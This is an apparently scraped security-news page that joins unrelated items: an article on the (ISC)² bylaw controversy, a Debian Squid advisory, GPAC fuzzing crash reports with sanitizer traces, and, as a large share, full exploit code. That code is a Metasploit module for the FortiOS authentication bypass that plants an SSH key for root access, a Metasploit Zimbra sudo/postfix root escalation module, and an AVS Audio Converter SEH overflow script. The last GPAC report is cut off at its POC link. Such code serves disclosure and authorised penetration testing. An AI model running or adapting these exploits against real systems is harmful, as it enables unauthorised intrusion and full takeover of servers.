A cross-site request forgery (CSRF) vulnerability in Jenkins Katalon Plugin 1.0.33 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

CVE-2022-43418: security - Multiple vulnerabilities in Jenkins plugins

Former chair bemoans ‘coup by governance’

Former chair bemoans ‘coup by governance’

Security certification body (ISC)² is being accused of promoting a series of ‘undemocratic' changes to its bylaws.

(ISC)² – the International Information System Security Certification Consortium – is a non-profit organization providing training and certification for cybersecurity professionals.

Over the last two years, it has been carrying out a review of its practices around committees, nominations, and governance. The aim, it said, is to create a more inclusive organization that is better positioned to serve the needs of the security profession in future.

**Bylaw amendments**

The proposed bylaw amendments, announced earlier this month, include allowing the establishment of other non-voting membership classes, adding the chair as an officer of (ISC)², and updating the standing committees to include ones overseeing audit, compensation and CEO succession, nominations, and risk.

There is also a new mission statement, reading: “(ISC)² exists to strengthen the influence, diversity, and vitality of the cybersecurity profession through advocacy, expertise, and workforce empowerment that accelerates cyber safety and security in an interconnected world.”

However, some of the proposed changes have raised concern.

**Member engagement shortcomings**

According to Wim Remes, a former board member who spent three years as (ISC)² chair, the organization currently has a poor record on member engagement, with election turnout averaging only around 4%.

As things stand, 500 endorsements are required for members to raise a petition. However, the new proposals would see this figure raised to 1% of the 170,000-odd members.

“This effectively shuts down an important relief valve in corporate governance, in my opinion, and is not in the interest of the membership,” Remes told The Daily Swig.

“It’s already impossible to get up to 500. It’s unthinkable anybody would make it to 1,600, \[or\] to 2,000.”

**Membership slate**

Also in the pipeline is a significant change to the process for electing the board of directors. If approved, this would remove the option for a write-in candidate and witness the board submitting a slate of qualified candidates to the membership that would be equal to the number of open seats.

“Combined with making the petition process harder – if not impossible – this is as close to a coup by governance as one could get,” Remes argued. “They still call it an election, but it is officially a coronation.”

Meanwhile, the Ethics Committee is to be eliminated as a standing committee of the board.

“I don’t know what the plan here is, but our profession stands and falls by ethics,” Remes explained. “I can’t find a rationale that would explain how we, as members, would not want the board to ensure that professional ethics are maintained by members.”

**Case for the defense**

Clar Rosso, CEO of (ISC)², defended the changes, stating they are aimed at making the organization more inclusive and globally representative.

“The proposed bylaw changes, which members will vote on, reflect not only creating a more inclusive organization, for example, eliminating the English fluency requirement and introducing best practices in term limits and nominations processes, but also modernize the bylaws by using gender neutral references to board officer position and moving our ethics process from one that is majority board-run to a process that is adjudicated by a broader cross-section of members,” Rosso told The Daily Swig.

“Additionally, many of these bylaw changes are reflective of best practices of other similarly-sized associations, and some simply provide clarity and ensure legal compliance with applicable state and federal laws. The (ISC)² board of directors, comprised entirely of member volunteers, supports the proposed changes.”

Members can vote on the proposed bylaw amendments from now until November 19, with proxy votes applied to a final bylaw vote during the annual meeting on December 14.

YOU MAY ALSO LIKE ‘We don’t teach developers how to write secure software’ – Linux Foundation’s David A Wheeler on reversing the CVE surge

Security certification body (ISC)² defends ‘undemocratic’ bylaw changes

This Metasploit module exploits an authentication bypass vulnerability in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API to gain access to a chosen account and then adds an SSH key to the authorized_keys file of the chosen account, allowing you to login to the system with the chosen account. Successful exploitation results in remote code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::SSH  prepend Msf::Exploit::Remote::AutoCheck  attr_accessor :ssh_socket  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',        'Description' => %q{          This module exploits an authentication bypass vulnerability          in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API          to gain access to a chosen account. And then add a SSH key to the          authorized_keys file of the chosen account, allowing          to login to the system with the chosen account.          Successful exploitation results in remote code execution.        },        'Author' => [          'Heyder Andrade <@HeyderAndrade>', # Metasploit module          'Zach Hanley <@hacks_zach>', # PoC        ],        'References' => [          ['CVE', '2022-40684'],          ['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],          ['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],        ],        'License' => MSF_LICENSE,        'DisclosureDate' => '2022-10-10', # Vendor advisory        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Privileged' => true,        'Targets' => [          [            'FortiOS',            {              'DefaultOptions' => {                'PAYLOAD' => 'generic/ssh/interact'              },              'Payload' => {                'Compat' => {                  'PayloadType' => 'ssh_interact'                }              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS,            ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file          ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),        OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),        OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),        OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),        OptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),        OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])      ]    )  end  def username    if datastore['USERNAME']      @username ||= datastore['USERNAME']    else      @username ||= detect_username    end  end  def ssh_rport    datastore['SSH_RPORT']  end  def current_keys    @current_keys ||= read_keys  end  def ssh_keygen    # ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`    if datastore['PRIVATE_KEY']      @ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key(        File.read(datastore['PRIVATE_KEY']),        datastore['KEY_PASS'],        datastore['PRIVATE_KEY']      )    else      @ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1')    end  end  def ssh_private_key    ssh_keygen.to_pem  end  def ssh_pubkey    Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)  end  def authorized_keys    pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)    "#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost"  end  def fortinet_request(params = {})    send_request_cgi(      {        'ctype' => 'application/json',        'agent' => 'Report Runner',        'headers' => {          'Forwarded' => "for=\"[127.0.0.1]:#{rand(1024..65535)}\";by=\"[127.0.0.1]:#{rand(1024..65535)}\""        }      }.merge(params)    )  end  def check    vprint_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")    # a normal request to the API should return a 401    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),      'ctype' => 'application/json'    })    return CheckCode::Unknown('Target did not respond to check.') unless res    return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401    # Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable    res = fortinet_request({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/system/status')    })    return CheckCode::Safe unless res&.code == 200    version = res.get_json_document['version']    print_good("Target is running the version #{version}, which is vulnerable.")    Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\t give you access to the host.') unless sock }    CheckCode::Vulnerable('And SSH is running which makes it exploitable.')  end  def cleanup    return unless ssh_socket    # it assumes our key is the last one and set it to a random text. The API didn't respond to DELETE method    data = {      "ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}" => '""'    }    fortinet_request({      'method' => 'PUT',      'uri' => normalize_uri(target_uri.path, '/system/admin/', username),      'data' => data.to_json    })  end  def detect_username    vprint_status('User auto-detection...')    res = fortinet_request(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/system/admin')    )    users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact    # we prefer to use admin, but if it doesn't exist we chose a random one.    if datastore['PREFER_ADMIN']      vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.")      users.include?('admin') ? 'admin' : users.sample    else      vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.")      (users - ['admin']).sample    end  end  def add_ssh_key    if current_keys.include?(authorized_keys)      # then we'll remove that on cleanup      print_good('Your key is already in the authorized_keys file')      return    end    vprint_status('Adding SSH key to authorized_keys file')    # Adding the SSH key as the last entry in the authorized_keys file    keystoadd = current_keys.first(2) + [authorized_keys]    data = keystoadd.map.with_index { |key, idx| ["ssh-public-key#{idx + 1}", "\"#{key}\""] }.to_h    res = fortinet_request({      'method' => 'PUT',      'uri' => normalize_uri(target_uri.path, '/system/admin/', username),      'data' => data.to_json    })    fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500    body = res.get_json_document    fail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/  end  def read_keys    vprint_status('Reading SSH key from authorized_keys file')    res = fortinet_request({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/system/admin/', username)    })    fail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200    result = res.get_json_document['results'].first    ['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key|      result[key].gsub('"', '') unless result[key].empty?    end.compact  end  def do_login(ssh_options)    # ensure we don't have a stale socket hanging around    ssh_options[:proxy].proxies = nil if ssh_options[:proxy]    begin      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do        self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)      end    rescue Rex::ConnectionError      fail_with(Failure::Unreachable, 'Disconnected during negotiation')    rescue Net::SSH::Disconnect, ::EOFError      fail_with(Failure::Disconnected, 'Timed out during negotiation')    rescue Net::SSH::AuthenticationFailed      fail_with(Failure::NoAccess, 'Failed authentication')    rescue Net::SSH::Exception => e      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")    end    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket  end  def exploit    print_status("Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}")    add_ssh_key    vprint_status('Establishing SSH connection')    ssh_options = ssh_client_defaults.merge({      auth_methods: ['publickey'],      key_data: [ ssh_private_key ],      port: ssh_rport    })    ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']    do_login(ssh_options)    handler(ssh_socket)  endend

Fortinet FortiOS / FortiProxy / FortiSwitchManager Authentication Bypass

This Metasploit module exploits a vulnerable sudo configuration that permits the Zimbra user to execute postfix as root. In turn, postfix can execute arbitrary shellscripts, which means it can execute a root shell.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Post::Linux::Priv  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Zimbra sudo + postfix privilege escalation',        'Description' => %q{          This module exploits a vulnerable sudo configuration that permits the          zimbra user to execute postfix as root. In turn, postfix can execute          arbitrary shellscripts, which means it can execute a root shell.        },        'License' => MSF_LICENSE,        'Author' => [          'EvergreenCartoons', # discovery and poc          'Ron Bowes',         # Module        ],        'DisclosureDate' => '2022-10-13',        'Platform' => [ 'linux' ],        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Privileged' => true,        'References' => [          [ 'CVE', '2022-3569' ],          [ 'URL', 'https://twitter.com/ldsopreload/status/1580539318879547392' ],        ],        'Targets' => [          [ 'Auto', {} ],        ],        'DefaultTarget' => 0,        'Notes' => {          'Reliability' => [ REPEATABLE_SESSION ],          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS ]        }      )    )    register_options [      OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]),      OptString.new('ZIMBRA_BASE', [ true, "Zimbra's installation directory", '/opt/zimbra' ]),    ]    register_advanced_options [      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),      OptString.new('PayloadFilename', [ false, 'The name to use for the executable (default: ".<random>"' ])    ]  end  # Because this isn't patched, I can't say with 100% certainty that this will  # detect a future patch (it depends on how they patch it)  def check    # Sanity check    if is_root?      fail_with(Failure::None, 'Session already has root privileges')    end    unless file_exist?("#{datastore['ZIMBRA_BASE']}/common/sbin/postfix")      print_error("postfix executable not detected: #{datastore['ZIMBRA_BASE']}/common/sbin/postfix (set ZIMBRA_BASE if Zimbra is installed in an unusual location)")      return CheckCode::Safe    end    unless command_exists?(datastore['SUDO_PATH'])      print_error("Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)")      return CheckCode::Safe    end    # Run `sudo -n -l` to make sure we have access to the target command    cmd = "#{datastore['SUDO_PATH']} -n -l"    print_status "Executing: #{cmd}"    output = cmd_exec(cmd).to_s    if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')      print_error('Current user could not execute sudo -l')      return CheckCode::Safe    end    if !output.include?("(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/common/sbin/postfix")      print_error('Current user does not have access to run postfix')      return CheckCode::Safe    end    CheckCode::Appears  end  def exploit    base_dir = datastore['WritableDir'].to_s    unless writable?(base_dir)      fail_with(Failure::BadConfig, "#{base_dir} is not writable")    end    # Generate some filenames    payload_path = File.join(base_dir, datastore['PayloadFilename'] || ".#{rand_text_alphanumeric(5..10)}")    upload_and_chmodx(payload_path, generate_payload_exe)    register_file_for_cleanup(payload_path)    cmd = "sudo #{datastore['ZIMBRA_BASE']}/common/sbin/postfix -D -v #{payload_path}"    print_status "Attempting to trigger payload: #{cmd}"    out = cmd_exec(cmd)    unless session_created?      print_error("Failed to create session! Cmd output = #{out}")    end  endend

Zimbra Privilege Escalation

Debian Linux Security Advisory 5258-1 - Several vulnerabilities were discovered in Squid, a fully featured web proxy cache, which could result in exposure of sensitive information in the cache manager (CVE-2022-41317), or denial of service or information disclosure if Squid is configured to negotiate authentication with the SSPI and SMB authentication helpers (CVE-2022-41318).

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5258-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoOctober 19, 2022                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : squidCVE ID         : CVE-2022-41317 CVE-2022-41318Debian Bug     : 1020586 1020587Several vulnerabilities were discovered in Squid, a fully featured webproxy cache, which could result in exposure of sensitive information inthe cache manager (CVE-2022-41317), or denial of service or informationdisclosure if Squid is configured to negotiate authentication with theSSPI and SMB authentication helpers (CVE-2022-41318).For the stable distribution (bullseye), these problems have been fixed inversion 4.13-10+deb11u2.We recommend that you upgrade your squid packages.For the detailed security status of squid please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/squidFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmNPspFfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Stmg//YqWFl3omXVLVD3yzv1C0MMXLcndcYPFb42tWRJr2eulh+7lOdC0gqLmg5l/iZLkFhvdAo2hsSN8c0jkKFm2n6GC4O6vc84DF5RE7xVbt8TXOBXZhq+C7FKLmRNa1y1M9UbjH7YsHbJvfWKEDJcDuceQFGcvFX2JsXYTtHnQtwYRpsUfZWOJkK/VYjvWOHKfeppgg1zeVCEiL3sQZ//7I+xd3ShzjR1iRj58L6tmF+64el+YFk6XGQtAAZHr4AsBv46VuEnfOvynJjCMs5Nm/zfceAhxez3tLRBJ0q7N7Ka/jNeFx7UAMigsoAZ2Bf3YXkYYPLcU9odl0VeCZRe/lxraUuPu9wBHK30jTfDastJPUJVwfTluyTB6LkCHm5UjzegRYw8EO/fHylND64TqW9xmuxmOrcdvo//MejOiKIDHTd3sX0ZkceXcwMQS7+qOvGAS9gUhSoG29XTAPWUj9sLpOnCmS5zSa2OdJ7ZX0Mv3sFs/HLe5MBLQ87E0t5R+US2XsTHcIBizCZxrYXOB3gtvBIV/4Ik06BF66QMXDlZuHqDNsWmJoKmBSHU6QFcbdnSfc1B0+1Aa8LKOXBSBt2WvSkrlCEA/TpuXKghjNLdJ4kBTNM8pD1iCj/j8mgUh5Bnr7SEp/Tgd006sTGcgVFLPFKnyxdAN8iG3N4+ijFxE==nyyH-----END PGP SIGNATURE-----

Debian Security Advisory 5258-1

AVS Audio Converter version 10.3 suffers from a stack overflow vulnerability.

    # Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH)# Discovered by: Yehia Elghaly - Mrvar0x# Discovered Date: 2022-10-16# Tested Version: 10.3.1.633# Tested on OS: Windows 7 Professional x86#pop+ret Address=005154E6#Message=  0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)# The only module that has SafeSEH disabled.# Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | # 0x00400000 | 0x01003000 | False  | False   | False |  False   | False  |#Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes.#Buffer  = '\x41'* 260#nSEH    = '\x42'*4#SEH     = '\x43'*4#ESI     = 'D*44' # ESI Overwrite #buffer = "A"*260 + [nSEH] + [SEH] + "D"*44#buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44# Rexploit:# Generate the 'evil.txt' payload using python 2.7.x on Linux.# Open the file 'evil.txt' Copy.# Paste at'Output Folder and click 'Browse'.#!/usr/bin/python -w  filename="evil.txt" buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44  textfile = open(filename , 'w')textfile.write(buffer)textfile.close()

AVS Audio Converter 10.3 Stack Overflow

GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a heap buffer overflow via the function gf_isom_box_dump_start_ex at /isomedia/box_funcs.c.

**Description**

Heap-buffer-overflow in isomedia/box\_funcs.c:2074 in gf\_isom\_box\_dump\_start\_ex

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**Replay**

    git clone https://github.com/gpac/gpac.git
    cd gpac
    ./configure --enable-sanitizer
    make -j$(nproc)
    ./bin/gcc/MP4Box -diso mp4box-diso-heap-buffer-over-flow-1
    

**POC**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/gpac/mp4box-diso-heap-buffer-over-flow-1

**ASAN**

    
    [iso file] Read Box type 04@0004 (0x04400004) at position 94 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Box "meta" (start 32) has 206 extra bytes
    [iso file] Box "uuid" (start 4061) has 58 extra bytes
    [iso file] Incomplete box mdat - start 4151 size 54847
    [iso file] Incomplete file while reading for dump - aborting parsing
    =================================================================
    ==18099==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000540 at pc 0x7f54a04dd880 bp 0x7ffcec3ea7e0 sp 0x7ffcec3ea7d0
    READ of size 1 at 0x604000000540 thread T0
        #0 0x7f54a04dd87f in gf_isom_box_dump_start_ex isomedia/box_funcs.c:2074
        #1 0x7f54a04dd87f in gf_isom_box_dump_start isomedia/box_funcs.c:2093
        #2 0x7f54a04c0ae7 in trgt_box_dump isomedia/box_dump.c:5807
        #3 0x7f54a04ddbb8 in gf_isom_box_dump isomedia/box_funcs.c:2108
        #4 0x7f54a0470ffa in gf_isom_box_array_dump isomedia/box_dump.c:104
        #5 0x7f54a04ddda8 in gf_isom_box_dump_done isomedia/box_funcs.c:2115
        #6 0x7f54a04c09d5 in trgr_box_dump isomedia/box_dump.c:5799
        #7 0x7f54a04ddbb8 in gf_isom_box_dump isomedia/box_funcs.c:2108
        #8 0x7f54a04714d6 in gf_isom_dump isomedia/box_dump.c:138
        #9 0x55e8639f1804 in dump_isom_xml /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/filedump.c:2067
        #10 0x55e8639c1d79 in mp4box_main /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/mp4box.c:6364
        #11 0x7f549f4e0c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #12 0x55e8639920a9 in _start (/home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/bin/gcc/MP4Box+0x4e0a9)
    
    0x604000000540 is located 0 bytes to the right of 48-byte region [0x604000000510,0x604000000540)
    allocated by thread T0 here:
        #0 0x7f54a2a4cb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
        #1 0x7f54a041bd12 in trgt_box_new isomedia/box_code_base.c:10623
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/box_funcs.c:2074 in gf_isom_box_dump_start_ex
    Shadow bytes around the buggy address:
      0x0c087fff8050: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
      0x0c087fff8060: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa
      0x0c087fff8070: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa
      0x0c087fff8080: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
      0x0c087fff8090: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00
    =>0x0c087fff80a0: fa fa 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
      0x0c087fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==18099==ABORTING
    

**Environment**

    Ubuntu 16.04
    Clang 10.0.1
    gcc 5.5

CVE-2022-43040: heap-buffer-overflow isomedia/box_funcs.c:2074 in gf_isom_box_dump_start_ex · Issue #2280 · gpac/gpac

GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function BD_CheckSFTimeOffset at /bifs/field_decode.c.

**Description**

SEGV in BD\_CheckSFTimeOffset bifs/field\_decode.c:58

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**Replay**

    git clone https://github.com/gpac/gpac.git
    cd gpac
    ./configure --enable-sanitizer
    make -j$(nproc)
    ./bin/gcc/MP4Box -bt mp4box-bt-segv-0
    

**POC**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/gpac/mp4box-bt-segv-0

**ASAN**

    
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent minf
    [iso file] Missing DataInformationBox
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Read Box type 0000 (0x30303030) at position 11542 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Box "moov" (start 20) has 806 extra bytes
    [iso file] Unknown top-level box type 0000
    [iso file] Incomplete box 0000 - start 12356 size 808358436
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent minf
    [iso file] Missing DataInformationBox
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Read Box type 0000 (0x30303030) at position 11542 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Box "moov" (start 20) has 806 extra bytes
    [iso file] Unknown top-level box type 0000
    [iso file] Incomplete box 0000 - start 12356 size 808358436
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 BIFS Scene Parsing
    [ODF] Reading bifs config: shift in sizes (not supported)
    ASAN:DEADLYSIGNAL                 | (00/100)
    =================================================================
    ==64022==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000001 (pc 0x7f4bf2457608 bp 0x7fff7805fc00 sp 0x7fff7805f360 T0)
    ==64022==The signal is caused by a READ memory access.
    ==64022==Hint: address points to the zero page.
        #0 0x7f4bf2457607  (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b607)
        #1 0x7f4befd4dd1a in BD_CheckSFTimeOffset bifs/field_decode.c:58
        #2 0x7f4befd53e80 in gf_bifs_dec_sf_field bifs/field_decode.c:105
        #3 0x7f4befd6a1be in BM_XReplace bifs/memory_decoder.c:355
        #4 0x7f4befd6a1be in BM_ParseExtendedUpdates bifs/memory_decoder.c:398
        #5 0x7f4befd754ad in BM_ParseInsert bifs/memory_decoder.c:586
        #6 0x7f4befd754ad in BM_ParseCommand bifs/memory_decoder.c:908
        #7 0x7f4befd7660d in gf_bifs_decode_command_list bifs/memory_decoder.c:1038
        #8 0x7f4bf0743bc6 in gf_sm_load_run_isom scene_manager/loader_isom.c:303
        #9 0x562cf53f8dd7 in dump_isom_scene /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/filedump.c:207
        #10 0x562cf53d37ff in mp4box_main /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/mp4box.c:6336
        #11 0x7f4beef6ec86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #12 0x562cf53a50a9 in _start (/home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/bin/gcc/MP4Box+0x4e0a9)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b607) 
    ==64022==ABORTING
    

**Environment**

    Ubuntu 16.04
    Clang 10.0.1
    gcc 5.5

CVE-2022-43043: SEGV BD_CheckSFTimeOffset bifs/field_decode.c:58 · Issue #2276 · gpac/gpac

GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function gf_dump_vrml_sffield at /scene_manager/scene_dump.c.

**Description**

SEGV scene\_manager/scene\_dump.c:693 in gf\_dump\_vrml\_sffield

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**Replay**

    git clone https://github.com/gpac/gpac.git
    cd gpac
    ./configure --enable-sanitizer
    make -j$(nproc)
    ./bin/gcc/MP4Box -bt mp4box-bt-segv-1
    

**POC**

